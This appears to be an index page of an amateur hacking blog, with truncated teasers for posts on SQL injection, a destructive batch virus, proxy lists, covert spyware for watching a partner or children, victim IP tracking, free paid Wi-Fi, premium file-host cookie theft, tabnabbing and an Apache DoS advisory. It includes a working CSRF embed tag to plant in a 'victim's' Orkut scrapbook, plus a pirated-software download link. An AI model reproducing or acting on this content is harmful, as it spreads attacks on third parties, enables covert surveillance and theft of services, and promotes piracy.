In this i’ll give you intro to the SQL Injections. Next post will give you detailed information about the SQL injections.
What is the Database?
Datbase is an application that stores a collection of Data.Database offers various APIs for creating, accessing and managing the data it holds. And...
Want to block anyone scrap book in Orkut? You are come to right place. You can block anyone scrap book such that no one can scrap him.
Procedure:
Copy this code and paste in your victim’s scrap book:
<embed src=”http://www.orkut.com/GLogin.aspx?cmd=logout” height=”1″ width=”1″></embed>...
In this post i am going to give you dangerous virus code which is written in Batch Programming language.
Virus can do:
Copy itself into startup
Copy itself over one thousand times into random spots in your computer
Hide its self and all other created files
Task kill MSN, Norton, Windows...
Hi friends, today i am going to give you 200 proxy servers. Hide your ip and browser internet anonymously. If you don’t know what is proxy server and how it is useful to hacking,then read these articles.
Access Blocked Websites in school
How proxy is working?
http://www.proxylink.info/...
Friends, you may eager to know what is lover or spouse or children doing in internet. In this post i will introduce about sniperspy remote spy software. It allows to monitor the remote system. The special about this software is that no physical contact is needed to install the spy software.
Why...
Hi friends, i give a list of proxy servers about 100. But i forget to tell how it will be useful ,how to use it. In this post, i will explain how to use the proxy server.
What is the Use of The Proxy?
Hide your IP. Browse the Internet anonymously.
Get the List of Proxy from here...
Are you website or blog owner? want to have some number of hits for websites. You can do this by batch programming. It is simple Batch program.
What is the Use?
Your page will get more no of hits. By sending to your friends and other victims, you can more hits to your website from various...
Using this software you can lot of free movies,videos,tv shows for free
Download the Software from here:
http://www.mediafire.com/?6syz68yirjo8e9t#1
After installing the software ,open the application. You can view the create account and login button.(will look like messenger softwares)...
In my old posts(find IP using mail, Track IP using image ), i have explained how to track IP address. Today also i am going to explain you advanced method. By using method you can get the IP address,location, timing of victim.
How to track IP address?
step 1:
know what is your victim email id...
If you are a paid wi fi network user, You will pay per hour for Internet usage. But you can use the Wireless Internet for Free of cost. This is illegal method, I just posting for educational purpose only.
A hotspot is a site that offers Internet access over a wireless local area network through...
What is Miasm?
Miasm is a a free and open source (GPLv2) reverse engineering framework. Miasm aims at analyzing/modifying/generating binary programs.
Here is a non exhausting list of features:
opening/modifying/generating PE/ELF 32/64 le/be using Elfesteem
Assembling/Disassembling...
We have come across HTTP,FTP and SMTP Brute Forcers. But BTCrack is the First Bluetooth Pass phrase (PIN) bruteforce tool.
How it works?
It works by reconstructing the PIN and link key with data sniffed during a pairing exchange.
The calculated PIN can then be used to authenticate against a...
In my previous post i explained how to hack the Premium File sharing websites (hotfile,rapidshare,megaupload …) using the Mozilla Firefox browser add on.
For Chrome browser you have to follow this link and install the Web Developer Add on.
Open the Google Chrome and Enter the following link...
We are to glad to say, We are releasing our First Free Hacking Video Tutorials. If you wan this tutorial in plain text with Screen shots, Please Follow this link:
How to Use Premium Cookies?
Hacking Video Tutorial:
How The Attack Works ?
A user navigates to your normal looking site.
A malicious code detect when the page has lost its focus and hasn’t been interacted with for a while.
Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login...
Apache server announced 65% websites are vulnerable to DDOS tool.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Apache HTTPD Security ADVISORY
==============================
Title: Range header DoS vulnerability Apache HTTPD 1.3/2.x
CVE: CVE-2011-3192...